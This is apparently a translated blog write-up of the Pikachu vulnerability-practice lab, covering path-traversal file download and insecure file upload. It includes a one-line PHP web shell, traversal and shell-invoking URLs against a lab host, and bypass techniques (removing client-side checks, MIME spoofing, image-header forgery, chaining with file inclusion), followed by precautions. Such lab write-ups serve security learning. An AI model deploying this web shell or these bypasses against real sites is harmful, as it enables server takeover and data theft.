Pikachu vulnerability exercise platform experiments - unsafe file downloads and uploads (seven)

Others 2019-10-09 15:29:26 views: null

1. Download the file unsafe

1.1 Overview

File download function will appear on many web systems, generally when we click on the download link, it will send a download request to the background, this request will usually contain the name of a file to be downloaded, backstage after receiving the request will begin to download the code , the file name of the corresponding file response to the browser to complete the download. If the file name backstage after receiving the request, it will download the file directly into the fight in the path of its security without judgment, then it could lead to unsafe file download vulnerability.
At this time, if the attacker is not expected to submit a program file name , but a carefully constructed path (such as ../../../etc/passwd), it is likely to be the specified file directly download. Resulting in a sensitive background information (password files, source code, etc.) is downloaded. Therefore, in the design file download function, if the downloaded file is passed by the goal came in the front, then the file must be passed in safety considerations.

Remember: All data and front-end interaction is unsafe and can not be taken lightly!

1.2. Experiment

Corresponds to a file name transmitted to the rear end, the background to find the file, and then outputs in response to the front end

When the test file download vulnerability, we can use directory traversal way

http://192.168.171.133/pikachu/vul/unsafedownload/execdownload.php?filename=../../../../../../../../../../1.txt

This time will be able to download the file we want, especially a lot of configuration files on Linux has a fixed directory

1.3. Precautions

  • Incoming file name and define strict filtering
  • Download the file directory strict filtering

 

2. unsafe file upload

2.1 Overview

Because the business functional needs, many Web sites have a file upload interface, such as:

  • Upload registration avatar picture (such as jpg, png, gif, etc.)
  • Upload file attachments (doc, xls, etc.)

And in the background and development, and not for security reasons uploaded files , or use of defective measures , an attacker can bypass security measures by some means in order to upload malicious files (eg: word Trojan)

So as to control the entire Web through backstage access to the malicious files

2.2 Test Process

  • The local file upload upload files as required, to see the return result (paths, tips, etc.)
  • Try to upload different types of "malicious" file, such as xx.php documents, analysis
  • View html source code to see if by js have been restricted in the front, you can bypass
  • Try different ways to bypass: black and white list bypass / MIME types to bypass the / etc directory 0x00 cut to bypass
  • Or in combination with other vulnerabilities speculation (such sensitive information, etc.) to give the horse path connection test

2.3. The client check

We first conducted a client check this experiment, this only allows us to upload pictures

When we choose a php file, it will direct the file does not meet the requirements, as follows

<?php echo shell_exec($_GET['cmd']);?>

Here look at this restriction is not done through the front

Can be seen, when the state input label is changed, it will call checkFileExt (), the following is the source of this function

The suffix function will determine whether the file in jpg, png and gif in these suffixes only run the upload.

But the front do restrict only a supporting role , can be bypassed, such as direct delete the contents of onchange

This time will be able to upload

Then use the file upload operation

http://192.168.171.133/pikachu/vul/unsafeupload/uploads/hack.php?cmd=ipconfig

 

2.4. Server check

MIME

MIME (Multipurpose Internet Mail Extensions) Multipurpose Internet Mail Extensions type. Is to set some kind of file extension type manner with an application to open when the extension of the file is accessed, the browser will automatically use the specified application to open. Some are used for clients to specify custom file names, as well as some media files Open.

Each MIME type consists of two parts, the front of a large class of data, such as sound audio, image and other image, define specific types later. Common MIME types, such as:

  • HTML: .html, .html text.html
  • Ordinary files: .txt text / plain
  • RTF file: .rtf application / rtf
  • GIF graphics: .gif image / gif
  • JPEG graphics: .jpeg, .jpg image / jpeg

$ _FILES () function

It gets Content-Type from the HTTP browser in advance, the Content-Type front-end user can be controlled

By using PHP's global array $ _FILES, you can upload files from the client computer to a remote server

The first parameter is the form input name, the second subscript can be a "name", "type", "size", "tmp_name" or "error", like this:

  • $ _FILES [ 'file'] [ 'name']: the name of the uploaded file
  • $ _FILES [ 'file'] [ 'type']: the type of uploaded files
  • $ _FILES [ 'file'] [ 'size']: the upload file size
  • $ _FILES [ 'file'] [ 'tmp_name']: name stored in a temporary copy of the file server
  • $ _FILES [ 'file'] [ 'error']: a file upload error code caused

experiment

When we upload a php file, an error, the following request header by modifying BurpSuite

Modified image / png, or other image types are OK

This time the file is uploaded successfully 

 

2.5. Getimagesize () type validation

getimagesize () returns the result has the file size and file type, if use this function to get the type to judge whether the picture, there will be problems.

It reads the target file of the first few hexadecimal string, look at the picture character does not meet the requirements, a fixed image file is the same as the first few strings

But the picture header can be forged, so it can be bypassed

We can see the first line of the picture with this command xxd

xxd image.png | head -n 1

We can try to upload a picture that contains malicious code, the production method is as follows

  • Method 1: CMD commands directly forged head GIF89A: copy / b test.png + muma.php cccc.png
  • Method 2: Use GIMP (open source photo editing software), by adding notes, write command execution
<?php phpinfo(); ?>

Then upload this file ccc.png

But we visited this image, the malicious code will not be executed . We can combine local file inclusion vulnerability in further use, guess the location where the picture upload

http://192.168.171.133/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2019/10/09/6470185d9d609075689635710502.png&submit=Submit+Query

2.6. Precautions

  • Do not upload limit implementation strategy for the frontend JS
  • Limit the upload files through the service side:
    • For multi-condition combination check : for example, file size, path, extension, file type, file integrity
    • For uploaded files on the server when storing rename (to develop a reasonable naming conventions)
    • Uploaded to the server directory access control (such as read only), to limit the harm execute permissions

 

Guess you like

Origin www.cnblogs.com/dogecheng/p/11640389.html
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com